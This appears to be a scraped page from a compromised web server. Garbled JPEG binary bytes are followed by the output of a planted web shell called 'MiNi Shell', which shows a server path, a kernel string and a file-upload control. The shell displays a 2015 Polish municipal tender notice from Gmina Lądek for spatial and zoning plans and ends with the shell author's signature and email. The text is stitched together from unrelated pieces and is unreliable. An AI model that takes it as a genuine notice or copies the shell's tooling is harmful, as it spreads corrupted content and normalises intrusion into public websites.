JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150424/94710-N-2015.html

<p class="kh_header"><b>Lądek: Sporządzenie zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Lądek oraz sporządzenie miejscowych planów zagospodarowania przestrzennego gminy dla wybranego obszaru w miejscowościach
- Dziedzice, Dolany,Wola Koszucka, Lądek , Wacławów , Ciążeń obręb Ciążeń Wschód, Ratyń, Sługocin.</b><br>
<b>Numer ogłoszenia: 94710 - 2015; data zamieszczenia: 24.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Lądek , ul. Rynek 26, 62-406 Lądek, woj. wielkopolskie, tel. 63 2763512, faks 63 2763512.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.gmina-ladek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Lądek oraz sporządzenie miejscowych planów zagospodarowania przestrzennego gminy dla wybranego obszaru w miejscowościach
- Dziedzice, Dolany,Wola Koszucka, Lądek , Wacławów , Ciążeń obręb Ciążeń Wschód, Ratyń, Sługocin..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sporządzenie zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Lądek oraz sporządzenie miejscowych planów  zagospodarowania przestrzennego gminy dla wybranego obszaru w miejscowościach  -Dziedzice ,Dolany, Wola Koszucka Lądek , Wacławów ,Ciążeń obręb Ciążeń Wschód, Ratyń, Sługocin.
I. Zmiana Studium Uwarunkowań i  kierunków gospodarowania przestrzennego nastąpić ma zgodnie z uchwałą Nr VII/34/15 Rady Gminy Lądek z dnia 26.02.2015r. a dotyczy obszaru o powierzchni 4281,30 ha.                  
II. Sporządzenie miejscowych planów zagospodarowania  przestrzennego dla wybranych obszarów gminy Lądek :1.Sporzadzenie miejscowego planu zagospodarowania przestrzennego gminy Lądek   dla wyznaczonych obszarów w gminie Lądek (zmiana dotyczy terenu o powierzchni 3 698,20 ha)  uchwalonego Uchwałą Nr VII/35/15 Rady Gminy Lądek z dnia 26.02.2015 r. Na wyznaczonych terenach rolnych wnioskuje się wprowadzenie lokalizacji zakazu lokalizacji elektrowni energii wiatrowych, biogazowi i ferm hodowlanych      
 2. Sporządzenie miejscowego planu zagospodarowania przestrzennego gminy Lądek  dla wybranego obszaru w miejscowości Dziedzice (zmiana dotyczy terenu o 
 powierzchni 175,0 ha), uchwalonego Uchwalą Nr VII/36/15 Rady Gminy Lądek z 
 dnia 26.02.2015r. Wyznaczony teren wnioskuje się pod zabudowę działalności 
 produkcyjnej, składowej i magazynowej.  
 3.  Sporządzenie miejscowego planu zagospodarowania przestrzennego gminy Lądek dla wybranego obszaru w miejscowości Dolany (zmiana dotyczy terenu o  powierzchni 14,30 ha), uchwalonego Uchwalą Nr VII/37/15 Rady Gminy Lądek z 
dnia 26.02.2015r.Wyznaczony teren wnioskuje się pod zabudowę działalności 
usługowej.  
 4. Sporządzenie miejscowego planu zagospodarowania przestrzennego gminy Lądek
 dla   wybranego obszaru w miejscowości Wola Koszucka (zmiana dotyczy terenu o 
 powierzchni 6,0 ha uchwalonego Uchwalą Nr VII/38/15 Rady Gminy Lądek z dnia 
 26.02.2015r. Wyznaczony teren wnioskuje się pod zabudowę działalności   produkcyjnej, składowej i magazynowej.   
 5. Sporządzenie miejscowego planu zagospodarowania przestrzennego gminy Lądek  dla wybranego obszaru w miejscowości Lądek (zmiana dotyczy terenu o powierzchni  106,5 ha), uchwalonego   Uchwalą Nr VII/39/15 Rady Gminy Lądek z dnia  26.02.2015r. Wyznaczony teren wnioskuje się pod zabudowę działalności   produkcyjnej, składowej i magazynowej oraz mieszkaniowa jednorodzinna.   
 6.Sporządzenie miejscowego planu zagospodarowania przestrzennego gminy Lądek 
 dla wybranego  obszaru w miejscowości Wacławów (zmiana dotyczy terenu o 
 powierzchni 83,0 ha), uchwalonego  Uchwalą   Nr VII/40/15 Rady Gminy Lądek z 
 dnia 26.02.2015r. Wyznaczony teren wnioskuje się pod zabudowę działalności 
 produkcyjnej, składowej i magazynowej.     
 7.Sporządzenie miejscowego planu zagospodarowania przestrzennego gminy Lądek 
  dla wybranego   obszaru w miejscowości Ciążeń, obręb Ciążeń Wschód (zmiana 
  dotyczy terenu o powierzchni 124,0  ha), uchwalonego Uchwalą Nr VII/41/15 Rady  Gminy Lądek z dnia 26.02.2015r. Wyznaczony teren    wnioskuje się pod zabudowę   działalności produkcyjnej, składowej i magazynowej.    
 8. Sporządzenie miejscowego planu zagospodarowania przestrzennego gminy Lądek dla wybranego obszaru w miejscowości Ratyń (zmiana dotyczy terenu o  powierzchni 9,30 ha), uchwalonego Uchwalą Nr VII/42/15 Rady Gminy Lądek z  dnia 26.02.2015r.    Wyznaczony teren wnioskuje się pod zabudowę działalności 
produkcyjnej, składowej i magazynowej.     
9. Sporządzenie miejscowego planu zagospodarowania przestrzennego gminy Lądek 
 dla wybranego obszaru w miejscowości Sługocin (zmiana dotyczy terenu o 
 powierzchni .66,0 ha), uchwalonego Uchwalą Nr VII/43/15 Rady Gminy Lądek z 
 dnia 26.02.2015r.  Wyznaczony teren wnioskuje się pod zabudowę działalności 
 produkcyjnej, składowej i magazynowej.               
III. Zakres prac, określony uchwałami Rady Gminy Lądek i objęty niniejszym zmówieniem należy podzielić na odrębne zadania i przeprowadzenie dla każdego zadania indywidualnego toku formalno - prawnego.
 W ramach przedmiotu zamówienia Wykonawca zobowiązuje się do:
1.Sporządzenia tekstu i rysunku projektu zmiany studium i sporządzenie miejscowych planów zgodnie z obowiązującą ustawą z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (t.j. Dz.U. z 2015r. poz199).          Zakres opracowywania określony jest w art. 9 i 15 wyżej powołanej ustawy oraz Rozporządzeniu Ministra Infrastruktury z dnia 26 sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003r. Nr 164, poz. 1587 z późniejszymi zmianami).
2.Opracowania prognozy oddziaływania na środowisko ustaleń studium i planów, zgodnie z ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisko i jego ochronie, udziale społeczeństwa w ochronnie środowiska oraz ocenach oddziaływania na środowisko (t.j. Dz. U. z 2013r., poz. 1235 z późniejszymi zmianami).                                       
3.Sporządzenia prognozy skutków finansowych uchwalenia planu, uwzględniającej wymagania rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowych planów zagospodarowania przestrzennego (Dz U. z 2003r. Nr 164, poz.1587).                                                          
4.Kompletowania dokumentacji formalno-prawne, w ciągu całego okresu sporządzenia projektu studium i miejscowych planów, zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz .U. z 2003r. Nr 164, poz. 1587).  
5.Opracowania rysunku projektu studium i miejscowych planów w wersji elektronicznej w formacie PDF, JPG   oraz  poza wymienionymi dodatkowo również w formacie DWG i SHP.
6.Zamieszczenia uchwały w sprawie uchwalenia studium i miejscowych planów zagospodarowania przestrzennego w BIP Lądek w zakładce prawo miejscowe.  
7.Przekazania do publikacji wraz z załącznikami uchwał w sprawie uchwalenia miejscowych planów zagospodarowania przestrzennego w Dzienniku Urzędowym Województwa Wielkopolskiego.
8.Udziału w publicznej dyskusji nad przyjętymi w projekcie planu rozwiązaniami i udzielanie wyjaśnień na pytania dotyczące przedmiotu zadania.                                  
9.Współpracy z Wójtem na wszystkich etapach sporządzania i uchwalania planu, a w szczególności udział w uzgodnieniach.
10.Udziału w sesji Rady Gminy Lądek, na której będą uchwalane plany miejscowe.             
11.Skompletowanie całości dokumentacji planistycznych, aby przedstawić Wojewodzie w celu oceny ich zgodności z przepisami prawnymi i publikacją w Dzienniku Urzędowym Województwa Wielkopolskiego.
12.Wykonanie zestawienia powierzchni działek objętych zmianą studium i planu miejscowego z określnikiem ich przeznaczenia w formie tabelarycznej. 
IV.Forma opracowania projektu zmiany studium i miejscowych planów:  1. Sporządzenie zmiany Studium uwarunkowań i kierunków zagospodarowania 
 Przestrzennego.
  1.1. Część tekstowa (wydruk) w formacie A4 z częścią graficzną obejmująca 
   wszystkie kolorowe  rysunki - w ilości 5 kompletów; 
1.2. Część graficzna obejmująca wszystkie kolorowe plansze zmiany studium w skali 1:10 000 pomniejszone odpowiednio do formatu A4 lub A3 ( forma książkowa) - w ilości 5 kompletów;
1.3 Część graficzna Studium w skali 1:10 000 wersji kolorowej - 1 egz. w wersji papierowej zafoliowany lub wykonany na materiale niezmywalnym i zapewniającym trwałość;                     
1.4. teczki dokumentów formalno-prawnych i materiałów związanych ze sporządzeniem zmiany Studium - 2 egz.; 
1.5. W wersji elektronicznej sporządzonej na nośnikach elektronicznych ( 3 szt) do odczytu i wydruku:
- część graficzna - format plików : JPG, PDF, dodatkowo poza wymienionymi formatami również w formacie DWG lub SHP
- część tekstowa - format plików: doc. i PDF
1.6.. Prognoza oddziaływania na środowisko - 3 egz. (wydruk +wersja elektroniczna).Wersja elektroniczna opracowań w wymaganych formatach: JPG i PDF.                                             
2. Sporządzenie miejscowych planów (dla każdego odrębne dokumenty).                                        
   2.1. Rysunek planu stanowiący załącznik do uchwały w sprawie sporządzenia planu w ilości:         
 a) w technice barwnej - 2 egz w wersji papierowej zafoliowany  lub wykonany na materiale niezmywalnym i zapewniającym trwałość + na nośniku CD  (format pliku JPG, PDF,dodatkowo poza wymienionymi również w formacie DWG lub SHP)                                                
b) w technice czarno-białej - 2 egz. + na nośniku CD (format pliku JPG, PDF,dodatkowo poza wymienionymi również w formacie DWG lub SHP)         
c) 2 egz. w technice i formacie zapewniającej możliwość publikacji w Dzienniku Urzędowym Województwa Wielkopolskiego. 
2.2. Tekst planu wykonany zostanie wydruk w ilości 3 egz. i w formie elektronicznej 2 egz.(wersja robocza zostanie dołączona do dokumentacji formalno-prawnej planu).             
2.3. Prognoza oddziaływania na środowisko - wydruk 3 egz. + na nośniku CD
2.4. Prognoza skutków finansowych uchwalenia planu miejscowego - wydruk 2 egz. +   na nośniku CD.
Przedmiot opracowania zadania zostanie  wykonany etapami , stanowiącymi 
przedmiot odrębnych   odbiorów i fakturowanie zgodnie z terminem ich realizacji 
określonymi w harmonogramie stanowiącym  załącznik nr 1 do umowy.
 Mapy niezbędne do opracowania projektu planów zapewnia Zamawiający .
 Zamawiający posiada opracowanie ekofizjograficzne Gminy Lądek.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2, 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2 000,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się  ubiegać Wykonawcy spełniający warunki zawarte w art.22 ust.1 pkt.1  ustawy PZP- prowadzenie działalności w zakresie objętym zamówieniem</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać Wykonawcy spełniający  warunki określone w art.22 ust. 1 pkt. 2 ustawy spełniający warunki udziału w postępowaniu tj:wymagane jest wykazanie przez Wykonawcę  jako uprawnionego projektanta w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy w tym okresie co najmniej 4 usług których przedmiotem było co najmniej : sporządzenie dwóch zmian studium i kierunków zagospodarowania przestrzennego dla  jednostki o obszarze co najmniej 8 000,00 ha , opracowanie  miejscowych planów zagospodarowania przestrzennego
dla terenów  o powierzchni minimum 150,00 ha każdy (minimum 2 plany)
Przez realizację usługi rozumie się publikację uchwały o sporządzeniu planu zagospodarowania przestrzennego w Dzienniku Urzędowym Województwa.Na okoliczność potwierdzenia należytego wykonania usług, Wykonawca zobowiązany jest przedłożyć poświadczenia lub stosownych referencji potwierdzających wykonanie usług  przestrzeni i zagospodarowania przestrzennego w skali lokalnej i regionalnej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie , że dysponuje odpowiednim potencjałem  technicznym niezbędnym do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi  legitymować się  przygotowaniem zawodowym  odpowiadającym warunkom określonym w art. 5 ustawy z dnia 27 marca 2003 r o planowaniu i 
zagospodarowaniu przestrzennym ( Dz. U z 2015 r poz.199) a mianowicie:
1/nabyły uprawnienia do projektowania w planowaniu przestrzennym na podstawie ustawy z dnia 12 lipca 1984 r . o planowaniu przestrzennym (Dz.U z 1989 r Nr 17 ,poz.99 z późn. zm)
2/nabyły uprawnienia urbanistyczne na podstawie art.41 ustawy z dnia 7 lipca 1994 r. ozagospodarowaqniu przestrzennym(Dz. U z 1999 r Nr 15, poz.139 z późn.zm)
3/posiadają kwalifikacje do wykonywania zawodu urbanisty na terytorium Rzeczypospolitej Polskiej uzyskane na podstawie ustawy z dnia 15 grudnia 2000 r o samorządach zawodowych architektów, inżynierów budownictwa oraz  urbanistów
(Dz. U z 2013 r. poz. 932 i 1650)
4/posiadają dyplom ukończenia studiów wyższych w zakresie architektury, urbanistyki lub gospodarki przestrzennej
5/posiadają dyplom ukończenia studiów wyższych w zakresie innym niż określonym
w pkt. 4 oraz ukończyły studia podyplomowe w zakresie planowania przestrzennego
urbanistyki  lub  gospodarki przestrzennej
6/są obywatelami państw członków Unii Europejskiej, Konfederacji Szwajcarskiej 
lub państwa Członkowskiego Europejskiego Porozummienia o Wolnym Handlu (EFTA)
- strony umowy o Europejskim Obszarze Gospodarczym, którzy nabyli kwalifikacje
zawodowe do projektowania zagospodarowania</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa  warunków udziału wpostępowaniu w zakresie sytuacji ekonomicznej i finansowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin wykonania zamówienia - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy zawarte są  w punkcie  O SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.gmina-ladek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Ladku , pok. nr 7 , ul. Rynek 26, 62-406 Lądek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2015 godzina 15:00, miejsce: Urząd Gminy Lądek, pok. nr 8 sekretariat, 62-406 Lądek, ul. Rynek 26..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com